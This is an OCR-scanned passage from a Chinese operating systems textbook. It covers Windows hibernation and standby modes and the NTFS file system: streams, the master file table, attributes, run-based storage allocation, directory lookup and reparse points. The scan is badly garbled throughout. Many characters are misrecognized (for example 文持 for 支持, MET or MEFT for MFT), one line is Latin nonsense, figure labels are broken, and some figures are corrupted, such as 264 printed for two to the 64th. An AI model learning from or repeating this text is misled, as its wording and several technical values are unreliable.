Windows 文 持 一 种 特殊 的 关机 模式 一 一 休眠 ， 该 模式 将 物理 内 存 复 
制 到 磁盘 ， 然 后 把 电力 消耗 降低 到 很 低 的 水 平 (笔记 本 电脑 在 休眠 状 
态 下 可 以 运行 几 个 星期 ) ， 电 池 的 消耗 也 变 得 十 分 缓慢 。 因 为 所 有 的 
内 存 状态 部 被 写 入 位 副 ， 我 们 甚至 可 以 在 笔记 本 电脑 休眠 的 时 候 为 其 
更 换 电 池 。 从 休眠 状态 重新 局 动 时 ， 系 统 恢复 已 保存 的 内 存 状态 并 重 
新 初始 化 设备 。 这 样 计 算 机 就 恢复 到 休眠 之 前 的 状态 ， 而 不 需要 重新 
登录 ， 也 不 必 重 新 启动 所 有 休眠 前 正在 运行 的 应 用 程序 和 服务 。 尽 管 
Windows 设 法 优化 这 个 过 程 (包括 忽略 在 磁盘 中 已 备份 而 在 内 存 中 未 被 
修改 的 页 面 及 压缩 其 他 内 存 页 面 以 减少 对 MO 操作 的 需求 ) ， 对 于 一 个 
有 几 个 GB 内 存 的 笔记 本 电脑 或 桌面 机 来 说 ， 仍 然 需要 人 花费 数秒 钟 的 时 
间 来 进入 休 虐 状态 。 


男 一 种 可 选择 的 模式 是 得 机 模式 ， 电 源 管 理 右 将 整个 系统 降 到 最 
低 的 功率 状态 ， 仅 使 用 足够 RAM 刷 新 的 功率 。 因 为 不 需要 将 内 存 复制 
到 磁盘 ， 进 入 待机 状态 比 进 入 休眠 状态 的 速度 更 快 。 但 是 竺 机 状态 不 
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电脑 更 换 电 池 ， 或 者 由 于 驱动 程序 故障 使 得 设备 切换 到 低 功 耗 状 态 后 
无 法 重新 初始 化 等 情况 ， 系 统 将 无 法 恢复 到 每 机 前 的 状态 。 在 开发 
Windows Vista 的 过 程 中 ， 微 软 和 很 多 便 件 设备 厂商 合作 ， 人 花费 了 极 大 
的 努力 改进 待机 模式 的 操作 。 他 们 也 终止 了 允许 应 用 软件 禁止 系统 进 
入 待机 模式 这 一 习惯 CART I Pic Se Eten AT MK tHE ic 
本 电脑 放 进 公文 包 ， 从 而 导致 笔记 本 电脑 过 热 ) 。 


有 很 多 关于 WDM (Windows Driver Model) 和 WDEF (Windows 
Driver Foundation) 的 有 用 的 书 (Cant, 2005; Oney, 2002; Orwick& 
Smith, 2007; Viscarola 等 人 ，2007) ° 


11.8 Windows NT 文件 系统 


Windows Vista 支 持 若 干 种 文件 系统 ， 其 中 最 重要 的 是 FAT-16、 
FAT-32 和 NTFS (NT 文件 系统 ) 。FAT-16 是 MS-DOS 文 件 系 统 ， 它 使 用 
16 位 磁盘 地 址 ， 这 就 限制 了 它 使 用 的 磁盘 分 区 不 能 大 于 2GB。 现 在 ， 
这 种 文件 系统 基本 上 仅 用 来 访问 软盘 。FAT-32 使 用 32 位 磁 副 地 址 ， 最 
大 文 持 2TB 的 磁盘 分 区 。FAT32 没 有 任何 安全 措施 ， 现 在 我 们 只 在 可 移 
动 介 质 (如 闪存 ) 中 使 用 它 。NTFS 是 一 个 专门 为 Windows NT 开发 的 
文件 系统 。 从 Windows XP 开始 ， 计 算 机 厂商 把 它 作 为 默认 安装 的 文件 
系统 ， 这 极 大 地 提升 了 Windows 的 安全 性 和 功能 。NTFS 使 用 64 位 磁盘 
地 址 并 且 (理论 上 ) 能 够 支持 最 大 264 字 节 的 磁盘 分 区 ， 尽 管 还 有 其 他 
因素 会 限制 磁盘 分 区 大 小 。 


因为 NTFS 文 件 系统 是 一 个 带 有 很 多 有 趣 的 特性 和 创新 设计 的 现代 
文件 系统 ， 在 本 章 中 我 们 将 针对 NTEFS 文 件 系 统 进行 讨论 。 NTFS 是 一 
个 大 而 且 复杂 的 文件 系统 ; 由 于 篇 幅 所 限 ， 我 们 不 能 讨论 其 所 有 的 特 
性 ， 但 是 接 下 来 的 内 容 会 使 读者 对 它 印象 深刻 。 


11.8.1 基本 概念 


NTFS 限 制 每 个 独立 的 文件 名 最 多 由 255 个 字符 组 成 ， 全 路 径 名 最 
多 有 32 767 个 字符 。 文 件 名 采用 Unicode 编 码 ， 人 允许 非 拉 丁 语系 国家 的 
用 户 (如 希腊 、 日 本 、 印 度 、 俄 罗斯 和 以 色 列 ) 用 他 们 的 母语 为 文件 
命名 。 例 如 ，qte 就 是 一 个 完全 合法 的 文件 名 。NTFS 完 全 文 持 区 分 大 
小 写 的 文件 名 (所 以 foo 与 Foo 和 FOO 是 不 同 的 ) 。Win32 API 不 完全 支 
持 区 分 大 小 写 的 文件 名 ， 并 且 根 本 不 支持 区 分 大 小 写 的 目录 名 。 为 了 
保持 与 UNIX 系 统 的 兼容 ， 当 运行 POSIX 子 系统 时 ，Windows 提 供 区 分 
大 小 写 的 文 持 。Win32 不 区 分 大 小 写 ， 但 是 它 保 持 大 小 写 状 态 ， 所 以 
文件 名 可 以 包含 大 写字 母 和 小 写字 母 。 尽 管区 分 大 小 写 是 一 个 UNIX 用 
户 非常 熟悉 的 特性 ， 但 是 对 一 般 用 户 而 言 ， 这 是 很 不 方便 的 。 例 如 ， 
现在 的 互联 网 在 很 大 程度 上 是 不 区 分 大 小 写 的 。 


与 FAT32 和 UNIX 文 件 不 同 ，NTFS 文 件 并 不 只 是 字 节 的 一 个 线性 
序列 ， 而 是 一 个 文件 由 很 多 属性 组 成 ， 每 个 属性 由 一 个 字 节 流 表示 。 
大 部 分 文件 都 包含 一 些 短 字 节 流 (如 文件 名 和 64 位 的 对 象 ID) ， 和 一 
个 包含 数据 的 未 命名 的 长 字 节 流 。 当 然 ， 一 个 文件 也 可 以 有 两 个 或 多 
个 数据 流 即 长 字 市 流 ， 。 每 个 流 有 一 个 由 文件 名 、 一 个 冒号 和 一 个 
流 名 组 成 的 名 字 ， 例 如 ，foo:stream1。 每 个 流 有 自己 的 大 小 ， 并 且 相 
对 于 所 有 其 他 的 流 都 是 可 以 独立 锁定 的 。 一 个 文件 中 存在 多 个 流 的 想 
法 在 NTFS 中 并 不 新 鲜 。 苹 果 Macintosh 的 文件 系统 为 每 个 文件 使 用 两 
个 流 ， 一 个 数据 分 文 (data fork) 和 一 个 资源 分 文 (resource fork) 。 


NTFS 中 多 数据 流 的 首次 使 用 是 为 了 允许 一 个 NT 文件 服务 需 为 


Macintosh 用 户 提供 服务 。 多 数据 流 也 用 于 表示 文件 的 元 数据 ， 例 如 
Windows GUI 中 使 用 的 JPEG 图 像 的 缩 略 图 。 但 是 ， 多 数据 流 很 脆弱 ， 
并 且 在 传输 文件 到 其 他 文件 系统 ， 通 过 网 络 传输 文件 甚至 在 文件 备份 
和 后 来 恢复 的 过 程 中 都 会 丢失 文件 。 这 是 因为 很 多 工具 都 忽略 了 它 
们 。 


与 UNIX 文 件 系 统 类 似 ，NTFS 是 一 个 层次 化 的 文件 系统 。 名 字 的 
各 部 分 之 间 用 只 分隔， 而 不 是 “”， 这 是 从 MS-DOS 时 代 与 CPM 相 兼 容 
的 需求 中 继承 下 来 的 。 与 UNIX 中 当前 工作 目录 的 概念 不 同 的 是 ， 作 为 
文件 系统 设计 的 一 个 基础 部 分 的 链接 到 当前 目录 (.) 和 父 目 录 (.) 
的 硬 连 接 ， 在 Windows 是 作为 一 种 惯例 来 是 实现 的 。 系 统 仅 在 其 中 的 
POSIX 子 系统 里 文 持 硬 连 接 ， 正 因为 这 样 ，NTFS 文 持 对 目 录 的 壳 历 检 
查 (UNIX 中 的 “x” 权 限 ) 。 


从 Windows Vista 开 始 ，NTEFS 才 开始 文 持 符 号 链接 。 为 了 避免 如 
Spoofing 这 样 的 安全 问题 (当年 在 UNIX 4.2BSD 第 一 次 引入 符号 链接 
时 就 遇 到 过 ) ， 通 常 只 允许 系统 管理 员 来 创建 符号 链接 。 在 Vista 中 符 
号 链接 的 实现 用 到 一 个 叫 再 解析 点 (reparse points) 的 NTFS 特 性 (将 
在 本 节 后 续 部 分 讨论 ) 。 另 外 ，NTFS 也 支持 压缩 、 加 密 、 容 错 、 日 志 
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11.8.2 NTFS 文 件 系统 的 实现 


NTFS 文 件 系统 是 专门 为 NT 系统 开发 的 ， 用 来 蔡 代 OS/2 中 的 HPFS 
文件 系统 的 。 它 是 一 个 具有 很 高 复杂 性 和 精密 性 的 文件 系统 。NT 系 统 
的 大 部 分 是 在 陆地 上 设计 的 。 从 这 方面 看 NTFS 与 NT 系统 其 他 部 分 相 
比 是 独一无二 的 ， 因 为 它 的 很 多 最 初 设计 都 是 在 一 艘 驶 出 普 吉 特 湾 的 
帆船 的 甲板 上 完成 的 (严格 遵守 上 午 工 作 ， 下 午 喝 啤酒 的 作息 协 
议 ) 。 


接 下 来 ， 我 们 将 从 NTFS 结 构 开始 ， 探 讨 一 系列 NTFS 特 性 ， 包 括 
文件 名 查找 、 文 件 压 缩 、 日 志和 加 密 。 


1. 文 件 系 统 结构 


每 个 NTFS 卷 (MEK) 都 包 仿 文件、 目录、 位 图 和 其 他 数据 
结构 。 每 个 卷 被 组 织 成 磁盘 块 的 一 个 线形 序列 (在 微软 的 术语 中 
FR”) ， 每 个 卷 中 块 的 大 小 是 固定 的 。 根 据 卷 的 大 小 不 同 ， 块 的 大 
小 从 512 字 节 到 64KB 不 等 。 大 多 数 NTFS 人 得 盘 使 用 4KB 的 块 ， 作 为 有 利 
于 高 效 传输 的 大 块 和 有 利于 减少 内 部 碎片 的 小 块 之 间 的 折 中 办 法 。 
个 块 用 其 相对 于 卷 起 始 位 置 的 64 位 偏 移 量 来 指示 。 


每 个 卷 中 的 主要 数据 结构 叫 MFT ( 主 文件 表 ，Master File 
Table) ， 该 表 是 以 1KB 为 固定 大 小 的 记录 的 线形 序列 。 每 个 MFT 记 杂 
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盘 上 的 地 址 的 列表 等 文件 属性 。 如 果 一 个 文件 非常 大 ， 有 时 候 会 需要 
两 个 或 更 多 的 MET 记 录 来 保存 所 有 块 的 地 址 列表 。 这 时 ， 第 一 个 MET 
记录 叫做 基本 记录 (base record) ， 该 记录 指向 其 他 的 MFT 记 录 。 这 种 
溢出 方案 可 以 追溯 到 CP/M， 那 时 每 个 目录 项 称 为 一 个 范围 (extent) 。 
用 一 个 位 图 记录 哪个 MFT 表 项 是 空 朵 的 。 


MFT 本 号 束 是 一 个 文件 ， 可 以 被 放 在 卷 中 的 任何 位 置 ， 这 样 束 避 
免 了 在 第 一 磁道 上 出 现 错误 记 区 引起 的 问题 。 而 且 MFT 可 以 根据 需要 
变 大 ， 最 大 可 以 有 2 入 个 记录 。 


图 11-41 是 一 个 MFT。 每 个 MFT 记 录 由 数据 对 〈 属 性 头 ， 值 ) 的 一 
个 序列 组 成 。 每 个 属性 由 一 个 说 明了 该 属性 是 什么 和 属性 值 有 多 长 的 
头 开始 。 一 些 属性 值 是 变 长 的 ， 如 文件 名 和 数据 。 如 果 属 性 值 足够 短 
能 够 放 到 MFT 记 录 中 ， 那 么 就 把 它 放 到 记录 里 。 这 叫做 直接 文件 
(immediate file, [Mullender and Tanenbaum, 1984]) 。 如 果 属 性 值 太 
长 ， 它 将 被 放 在 磁盘 的 其 他 位 置 ， 并 在 MEFT 记 录 里 存放 一 个 指向 它 的 
指针 。 这 使 得 NTFS 对 于 小 的 域 “ 即 那些 能 够 放 入 MET 记 录 中 的 域 ) SE 
常 有 效率 。 
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图 11-41 NTFS 主 文件 表 


最 开始 的 16 个 MFT 记 录 为 NTFS 元 数据 文件 而 预 留 ， 如 图 11-41 所 
示 。 每 一 个 记录 描述 了 一 个 正常 的 具有 属性 和 数据 块 的 文件 ， 束 如 同 
其 他 文件 一 样 。 这 些 文件 中 每 一 个 都 由 “$" 开 始 表 明 它 是 一 个 元 数据 文 
件 。 第 一 个 记录 描述 了 MET 文 件 本 吴 。 它 说 明了 MEFT 文 件 的 块 都 放 在 


哪里 以 确保 系统 能 找到 MFT 文 件 。 很 明显 ，Windows 需 要 一 个 方法 找到 
MFT 文 件 中 第 一 个 块 ， 以 便 找到 其 余 的 文件 系统 信息 。 找 到 MFT 文 件 
中 人 第 一 个 块 的 方法 是 查看 局 动 块 ， 那 是 着 被 格式 化 为 文件 系统 时 地 址 
所 存放 的 位 置 。 


记录 1 十 MFT 文 件 早期 部 分 的 复制 。 这 部 分 信息 非常 重要 ， 因 此 拥 
有 第 二 份 拷贝 至 关 重 要 以 防 MFT 的 第 一 块 坏 掉 。 记 录 2 是 一 个 Log 文 
件 。 当 对 文件 系统 做 结构 性 的 改变 时 ， 例 如 ， 增 加 一 个 新 目录 或 删除 
一 个 现 有 目 孙 ， 动 作 在 执行 前 就 记录 在 Log 里 ， 从 而 增加 在 这 个 动作 执 
行 时 出 错 后 (比如 一 次 系统 崩溃 ) 被 正确 恢复 的 机 会 。 对 文件 属性 做 
的 改变 也 会 记录 在 这 里 。 事 实 上 ， 唯 一 不 会 记录 的 改变 是 对 用 户 数据 
的 改变 。 记 好 3 包含 了 卷 的 信息 ， 比 如 大 小 、 卷 标 和 版 本 。 


上 面 提 到 ， 每 个 MFT 记 录 包 含 一 个 〈 属 性 头 ， 值 ) 数据 对 的 序 
列 。 属 性 在 $AttrDef 文 件 中 定义 。 这 个 文件 的 信息 在 MEFT 记 录 4 里 。 接 
下 来 是 根 目录 ， 根 目录 本 身 是 一 个 文件 并 且 可 以 变 为 任意 长 度 。MFT 
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卷 里 的 空余 空间 通过 一 个 位 图 来 跟踪 。 这 个 位 图 本 身 是 一 个 文 
件 ， 它 的 磁盘 地 址 和 属性 由 MFT 记 录 6 给 出 。 下 一 个 MFT 记 录 指 向 引导 
装载 程序 。 记 录 8 用 来 把 所 有 的 坏 块 链接 在 一 起 来 确保 不 会 有 文件 使 用 
它们 。 记 录 9 包 含 安 全 信息 。 记 录 10 用 于 大 小 写 上 映射。 对 于 拉丁 字母 A- 
Z， 映 射 是 非常 明确 的 (至少 是 对 说 拉丁 语 的 人 来 说 ) 。 对 于 其 他 语言 


的 上 映射， 如 希腊 、 亚 美 尼 亚 或 乔治 亚 ， 束 对 于 讲 拉丁 语 的 人 不 太 明 
确 ， 因 此 这 个 文件 告诉 我 们 如 何 做 。 最 后 ， 记 录 11 是 一 个 目 隶 包含 杂 
项 文件 用 于 磁盘 配额 、 对 象 标 识 符 、 再 解析 点 ， 等 等 。 最 后 四 个 MFT 
记录 修 留 作 将 来 使 用 。 


每 个 MET 记 录 由 一 个 记录 头 和 后 面 跟着 的 〈 属 性 头 ， 值 ) 对 组 
成 记录 头 包含 一 个 幻 数 用 于 有 效 性 检查 ， 一 个 序列 号 (每 次 当 记 录 
被 一 个 新 文件 再 使 用 时 就 被 更 新 ) ， 文 件 引 用 记 数 ， 记 录 实 际 使 用 的 
字 市 数 ， 基 本 记录 〈 仅 用 于 扩展 记录 ) 的 标识 符 RII, FIS), 
和 其 他 一 些 杂项 。 


NTFS 定 义 了 13 个 属性 能 够 出 现在 MFT 记 录 中 。 图 11-42 列 出 了 这 些 
属性 。 每 个 属性 头 标识 了 属性 ， 给 出 了 长 度 ， 值 字段 的 位 置 ， 一 些 各 
种 各 样 的 标记 和 其 他 信息 。 通 常 ， 属 性 值 直接 跟 在 它们 的 属性 头 后 
面 ， 但 是 如 果 一 个 值 对 于 一 个 MET 记 录 太 长 的 话 ， 它 可 能 被 放 在 不 同 
的 磁盘 块 中 。 这 样 的 属性 称 作 非常 驻 属性 ， 数 据 属 性 很 明显 就 是 这 样 
一 个 属性 。 一 些 属 性 ， 像 名 字 ， 可 能 出 现 重复 ， 但 是 所 有 属性 必须 在 
MEFT 记 录 中 按照 固定 顺序 出 现 。 常 驻 属 性 头 有 24 个 字 节 长 ;非常 驻 属 
性 头 会 更 长 ， 因 为 它们 包含 关于 在 磁盘 上 哪些 位 置 能 找到 这 些 属 性 的 
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安全 描述 符 
属性 列表 
重 解 机 点 H 链接 
当前 卷 的 名 字 〈 仅 用 于 $Volume) 
卷 版 本 〈 仅 用 于 $Volume ) 
索引 根 
用 于 很 大 的 目录 
用 于 很 大 的 目录 
日 志 工 具 流 | 控制 记录 日 志 到 $LogFile 
数据 流 ; 可 以 重复 


图 11-42 MFT 记 录 中 使 用 的 属性 


标准 的 信息 域 包含 文件 所 有 者 、 安 全 信息 、POSIX 需 要 的 时 间 
戳 、 硬 连接 计数 、 只 读 和 存档 位 ， 等 等 。 这 些 域 是 固定 长 度 的 ， 并 且 
总 是 存在 的 。 文 件 名 是 一 个 可 变 长 度 Unicode 编 码 的 字符 串 。 为 了 使 具 
有 非 MS-DOS 文 件 名 的 文件 可 以 访问 老 的 16 位 程序 ， 文 件 也 可 以 有 一 个 
符合 8+3 规 则 的 MS-DOS 短 名 字 。 如 果实 际 文件 名 符合 8+3 命 名 规则 ， 
第 二 个 MS-DOS 文 件 名 就 不 需要 了 。 


在 NT4.0 中 ， 安 全 信息 被 放 在 一 个 属性 中 ， 但 在 Windows 2000 及 以 
后 的 版 本 中 ， 安 全 信息 全 部 都 放 在 一 个 单独 的 文件 中 使 得 多 个 文件 可 
以 共享 相同 的 安全 描述 。 由 于 安全 信息 对 于 每 个 用 户 的 许多 文件 来 说 
是 相同 的 ， 于 是 这 使 得 许多 MFT 记 录 和 整个 文件 系统 节省 了 大 量 的 空 
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当 属性 不 能 全 部 放 在 MFT 记 录 中 时 ， 就 需要 使 用 属性 列表 。 这 个 
属性 就 会 说 明 在 哪里 找到 扩展 记录 。 列 表 中 的 每 个 条 目 在 MFT 中 包含 
一 个 48 位 的 索引 来 说 明 扩 展 记录 在 哪里 ， 还 包含 一 个 16 位 的 序号 来 验 
证 扩展 记录 与 基本 记录 是 否 匹配 。 


吏 像 UNIX 文 件 拥 有 一 个 IF 点 号 一 样 ，NTFS 文 件 也 有 一 个 ID。 文 
件 可 以 依据 ID 被 打开 ， 但 是 由 于 ID 是 基于 MEFT 记 录 的 ， 并 且 可 以 因 该 
文件 的 记录 移动 〈《 例 如， 如 果 文 件 因 备份 被 恢复 ) 而 改变 ， 所 以 当 ID 
必须 保持 不 变 时 ， 这 个 NTEFS 分 配 的 ID 并 不 总 是 有 用 。NTFS 人 允许 有 一 
个 可 以 设置 在 文件 上 而 且 永 远 不 需要 改变 的 独立 对 象 ID 属性 。 举 例 来 
说 ， 当 一 个 文件 被 拷贝 到 一 个 新 卷 时 ， 这 个 属性 随 着 文件 一 起 过 去 。 


重 解析 点 告诉 分 析 文 件 名 的 过 程 来 做 特别 的 事 。 这 个 机 制 用 于 显 
式 加 载 文件 系统 和 符号 链接 。 两 个 卷 属 性 用 于 标示 卷 。 随 后 三 个 属性 
处 理 如 何 实现 目 永 一 一 小 的 目录 束 文 件 列 表 ， 天 的 目 永 使 用 B+ 树 实 
现 。 日 志 工 具 流 属性 用 来 加 密 文 件 系统 


最 后 ， 我 们 关注 最 重要 的 属性 : 数据 流 〈 在 一 些 情况 下 叫 流 ) 。 
一 个 NTFS 文 件 有 一 个 或 多 个 数据 流 ， 这 些 束 古人 负载 所 在 。 上 默认 数据 流 
是 未 命名 的 例如， 目录 路 径 \ 文 件 名 : $DATA) ， 但 是 替代 数据 流 有 
目 己 的 名 字 ， 例 如 : 目录 路 人 径 \ 文 件 名 : 流 名 : $DATA ° 


对 于 每 个 流 ， 流 的 名 字 (如 果 有 ) 会 在 属性 头 中 。 头 后 面 要 么 是 
说 明了 流 包 含 哪 些 块 的 磁盘 地 址 列表 ， 要 么 是 仅 几 百 字 节 大 小 的 流 
(有 许多 这 样 的 流 ) 本 号。 存储 了 实际 流 数 据 的 MFT 记 录 称 为 立即 文 
件 (Mullenderf#ilTanenbaum, 1984) ° 


当然 ， 大 多 数 情 况 下 ， 数 据 放 不 进 一 个 MFT 记 有 杂 中 ， 因 此 这 个 属 
性 通常 是 非常 驻 属性 。 现 在 让 我 们 看 一 看 NTFS 如 何 记录 特殊 数据 中 非 
常 驻 属性 的 位 置 。 


2. 存 储 分 配 


保持 对 人 磁盘 中 在 可 能 的 情况 下 ， 连 续 分 配 的 块 进行 跟踪 的 模型 ， 
这 是 出 于 效率 的 原因 。 举 例 来 说 ， 如 来 一 个 流 的 第 一 个 逻辑 块 放 在 磁 
盘 上 的 块 20， 那 么 系统 将 努力 把 第 二 个 逻辑 块 放 在 块 21， 第 三 个 逻辑 
块 放 在 块 22， 以 此 类 推 实现 这 些 行 串 的 一 个 方法 古 尽 可 能 一 次 分 配 
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上 连续 的 块 ， 对 于 一 个 没有 孔 的 流 来 说 ， 只 有 唯一 的 一 个 记录 。 按 从 


头 到 尾 的 顺序 写 的 流 都 属于 这 一 类 。 对 于 一 个 包含 一 个 孔 的 流 〈 例 
如 ， 只 有 块 0~49 和 块 60 全 79 被 定义 了 ) ， 会 有 两 个 记录 。 这 样 的 流 会 
产生 于 先 写 入 前 50 个 块 ， 然 后 找到 逻辑 上 第 60 块 ， 然 后 写 其 他 20 个 
块 。 当 孔 被 读 出 时 ， 用 全 零 表 示 。 有 和 孔 的 文件 称 为 稀 玻 文件 。 


每 个 记录 始 于 一 个 头 ， 这 个 头 给 出 第 一 个 块 在 流 中 偏 移 量 。 接 着 
征 没 有 被 记录 才 兰 的 第 一 个 块 的 偶 移 量 。 在 上 面 的 例子 中 ， 第 一 个 记 
录 有 一 个 (0, 50) 的 头 ， 并 会 提供 这 50 个 块 的 磁盘 地 址 。 第 二 个 记录 
有 一 个 (60, 80) 的 头 ， 会 提供 其 他 20 个 块 的 磁盘 地 址 。 


每 个 记录 的 头 后 面 跟着 一 个 或 多 个 对 ， 每 个 对 给 出 了 磁盘 地 址 和 
持续 长 度 。 磁 盘 地 址 是 该 磁 强 块 离 本 分 区 起 点 的 侦 移 量 ;游程 在 行 串 
中 块 的 数量 。 在 一 段 行 串 记 录 中 和 需要 有 和 多少 对 束 可 以 有 多 少 对 。 图 11- 
43 搞 述 了 用 这 种 方式 表示 的 三 段 、9 块 的 流 。 
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图 11-43 有 3 个 连续 空间 、9 个 块 的 短 流 的 一 条 MFT 记 录 


在 这 个 图 中 ， 有 一 个 9 个 块 ( 头 ，0~8) 的 短 流 的 MFT 记 录 。 它 由 
磁盘 上 三 个 行 串 的 连续 块 组 成 。 第 一 段 是 块 20~23， 第 二 段 是 块 64~~ 
65， 人 第 三 段 是 80~82。 每 一 个 行 串 被 记录 在 MEFT 记 录 中 的 一 个 N 
地 址 ， 块 计数 ) 对 中 。 有 多 少 行 串 是 依赖 于 当 流 被 创建 时 磁盘 块 分 配 
器 在 找 连续 块 的 行 串 时 做 的 有 多 好 。 对 于 一 个 n 块 的 流 ， 段 数 可 能 是 从 ] 
到 n 的 任意 值 。 


有 必要 在 这 里 做 几 点 说 明 : 


首先 ， 用 这 种 方法 表达 的 流 的 大 小 没有 上 限 限 制 。 在 地 址 不 压缩 
的 情况 下 ， 每 一 对 需要 两 个 64 位 数 表 示 ， 总 共 16 字 节 。 然 而 ， 一 对 能 
够 表示 100 万 个 甚至 更 多 的 连续 的 磁盘 空间 。 实 际 上 ，20M 的 流 包含 20 
个 独立 的 包含 100 万 个 1KB 的 块 的 行 串 ， 每 个 都 可 以 轻易 地 放 在 一 个 
MEFT 记 录 中 ， 然 而 一 个 60KB 的 被 分 散 到 60 个 不 同 的 块 的 流 却 不 行 。 


其 次 ， 表 示 每 一 对 的 直截了当 的 方法 会 占用 2x8 个 字 市 ， 有 压缩 方 
法 可 以 把 一 对 的 大 减 小 到 低 于 16 字 节 。 许 多 磁盘 地 址 有 多 个 高 位 0 字 
节 。 这 些 可 以 被 忽略 。 数 据 头 能 告诉 我 们 有 多 少 个 高 位 0 字 节 被 忽略 
了 ， 也 融 是 说 ， 在 一 个 地 址 中 实际 上 有 多 少 个 字 世 被 用 。 也 可 以 用 其 
他 的 压缩 方式 。 实 际 上 ， 一 对 经 常 只 有 4 个 字 科 。 


第 一 个 例子 是 比较 容易 的 : 所 有 的 文件 信息 能 容纳 在 一 个 MEFT 记 
录 中 ， 如 果 文 件 比较 大 或 者 是 高 度 碎 卢 化 以 至 于 信息 不 能 放 在 一 个 
MEFT 记 录 当 中 ， 这 时 会 发 生 什么 呢 ? 答案 很 简单 : 用 两 个 或 更 多 的 
MEFT 记 录 。 从 图 11-44 可 以 看 出 ， 一 个 文件 的 首 MEFT 记 录 是 102， 对 于 
一 个 MFT 记 录 而 言 它 有 太 多 的 行 串 ， 因 而 它 会 计算 需要 多 少 个 扩展 的 
MFT 记 录 。 比 如 说 两 个 ， 于 是 会 把 它们 的 索引 放 到 首 记录 中 ， 首 记录 
剩余 的 空间 用 来 放 前 k 个 行 串 。 


第 二 个 扩 


一 一 
展 记 录 


第 一 个 扩 


展 记 录 


图 11-44 需要 三 个 MTF 记 录 和 存储 其 所 有 行 串 的 文件 


注意 ， 图 11-44 包 含 了 一 些 多 余 的 信息 。 理 论 上 不 需要 指出 一 捉 行 
捉 的 结尾 ， 因 为 这 些 信息 可 以 从 行囊 对 中 计算 出 来 。 列 出 这 些 信息 是 
为 了 更 有 效 地 搜索 ， 找 到 在 一 个 给 定 文件 偏 移 量 的 块 ， 只 需要 去 检查 
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当 MFT 记 录 102 中 所 有 的 空间 被 用 完 后 ， 剩 余 的 行 串 继续 在 MEFT 记 
录 105 中 存放 ， 并 在 这 个 记录 中 放 入 尽 可 能 多 的 项 。 当 这 个 记录 也 用 完 
后 ， 剩 下 的 行 串 放 在 MEFT 记 录 108 中 。 这 种 方式 可 以 用 多 个 MEFT 记 录 去 
处 理 大 的 分 段 存储 文件 。 


有 可 能 会 出 现 这 样 的 问题 ， 如 果 文 件 需 要 的 MFT 记 录 太 多 ， 以 至 
于 首 个 MTF 记 录 中 没有 足够 的 空间 去 存放 所 有 的 索引 。 解 决 这 个 问题 
的 方法 是 : 使 扩展 的 MFT 记 录 列 表 成 为 非 驻 留 的 ( 即 ， 存放 在 其 他 的 
硬 副 区 域 而 不 是 在 首 MFT 记 录 中 ) ， 这 样 它 就 能 根据 需要 而 增 大 。 


图 11-45 表 示 一 个 MFT 表 项 如 何 接 述 一 个 小 目录 。 这 个 记录 包含 耕 
干 目 好 项 ， 每 一 个 目录 项 可 以 揪 述 一 个 文件 或 目录 。 每 个 表 项 包含 一 
a 


件 对 应 的 MFT 表 项 的 索引 、 文件 名 长 度 以 及 其 他 的 属性 和 标志 。 在 目 
杂 中 查找 一 个 目录 项 需要 依次 检查 所 有 的 文件 名 。 


目录 项 包含 该 文件 对 应 的 MFT 表 项 的 索引 、 文 
标准 信息 头 索引 根 头 件 名 长 度 、 文 件 名 本 身 以 及 其 他 的 字段 和 标志 


Al 11-45 描述 小 目录 的 MFT 记 也 


大 目录 采用 一 种 不 同 的 格式 ， 即 用 B+ 树 而 不 是 线性 结构 来 列 出 文 
件 。 通 过 B+ 树 可 以 按照 字母 顺序 查找 文件 ， 并 且 更 容易 在 目 孙 的 正确 
位 置 插 入 新 的 文件 名 。 


现在 有 足够 的 信息 去 描述 使 用 文件 名 对 文件 ??\C:\foo\bar 的 查找 是 
如 何 进行 的 。 从 图 11-22 可 以 知道 Win32、 原 生 NT 系 统 调用 、 对 象 和 1/O 
管理 器 如 何 协作 通过 向 C 盘 的 NTFS 设 备 栈 (device stack) 发 送 WO 请 求 
打开 一 个 文件 。IO 请 求 要 求 NTFS 为 剩余 的 路 径 名 \foo\bar 盾 写 一 个 文 
件 对 象 。 


NTFS 从 C 副 根 目录 开始 分 析 \foo\bar 路 径 ，C 副 的 块 可 以 在 MFT 中 
的 第 五 个 表 项 中 找到 (参考 图 11-41) 。 然 后 在 根 目 录 中 查找 字符 
串 “foo”， 返 回 目录 foo 在 MEFT 中 的 索引 ， 接 着 再 查找 字符 串 “bar"， 得 到 
这 个 文件 的 MFT 记 录 的 引用 。NTFS 通 过 调用 安全 引用 管理 器 来 实施 访 
问 检 查 ， 如 果 所 有 的 检查 都 通过 了 ，NTFS 从 MFT 记 录 中 搜索 得 
到 ::$DATA 属 性 ， 即 默认 的 数据 流 。 


找到 文件 par 后 ，NTFS 在 IO 管理 器 返回 的 文件 对 象 上 设置 指针 指 
向 它 自 己 的 元 数据 。 元 数据 包括 指向 MEFT 记 录 的 指针 、 压 缩 和 范围 
锁 、 各 种 关于 共享 的 细 记 等 。 大 多 数 元 数据 包含 在 一 些 数据 结构 中 ， 
这 些 数据 结构 被 所 有 3 引用 这 个 文件 的 文件 对 象 共 享 。 有 一 些 域 是 当前 
打开 的 文件 特有 的 ， 比 如 当 这 个 文件 被 关闭 时 是 否 需要 删除 。 一 旦 文 
件 成 功 打 开 ，NTFS 调 用 IoCompleteRequest， 它 通过 把 IPR 沿 WO 栈 向 上 


传递 给 IO 和 对 象 管理 器 。 最 终 ， 这 个 文件 对 象 的 句柄 被 放 进 当前 进程 
的 句柄 表 中 ， 然 后 回 到 用 户 态 。 之 后 调用 ReadFile 时 ， 应 用 程序 能 够 提 
供 句柄 ， 该 句柄 表明 C:foovbar 文 件 对 象 应 该 包含 在 传递 到 C: 设备 栈 给 
NTFS 的 读 请 求 中 。 


除了 支持 普通 文件 和 目录 外 ，NTFS 支 持 像 UNIX 那 样 的 硬 连 接 ， 
也 通过 一 个 叫做 重 解 析 点 的 机 制 文 持 符 号 链接 。NTFS 文 持 把 一 个 文件 
或 者 目 孙 标记 为 一 个 重 解析 点 ， 并 将 其 和 一 块 数据 关联 起 来 。 当 在 文 
件 名 解析 的 过 程 中 遇 到 这 个 文件 或 目 未 时， 操作 融会 失败 ， 这 块 效 据 
被 返回 到 对 象 管理 右 。 对 象 管理 器 将 这 块 数据 解释 为 另 一 个 路 径 名 ， 
然后 更 新 需要 解析 的 字符 种， 并 重启 IO 操作 。 这 种 机 制 用 来 文 持 符号 
链接 和 挂 载 文 件 系统 ， 把 文件 搜索 重 定 同 到 目录 层次 结构 的 男 外 一 个 
部 分 甚至 到 男 外 一 个 不 同 的 分 区 。 


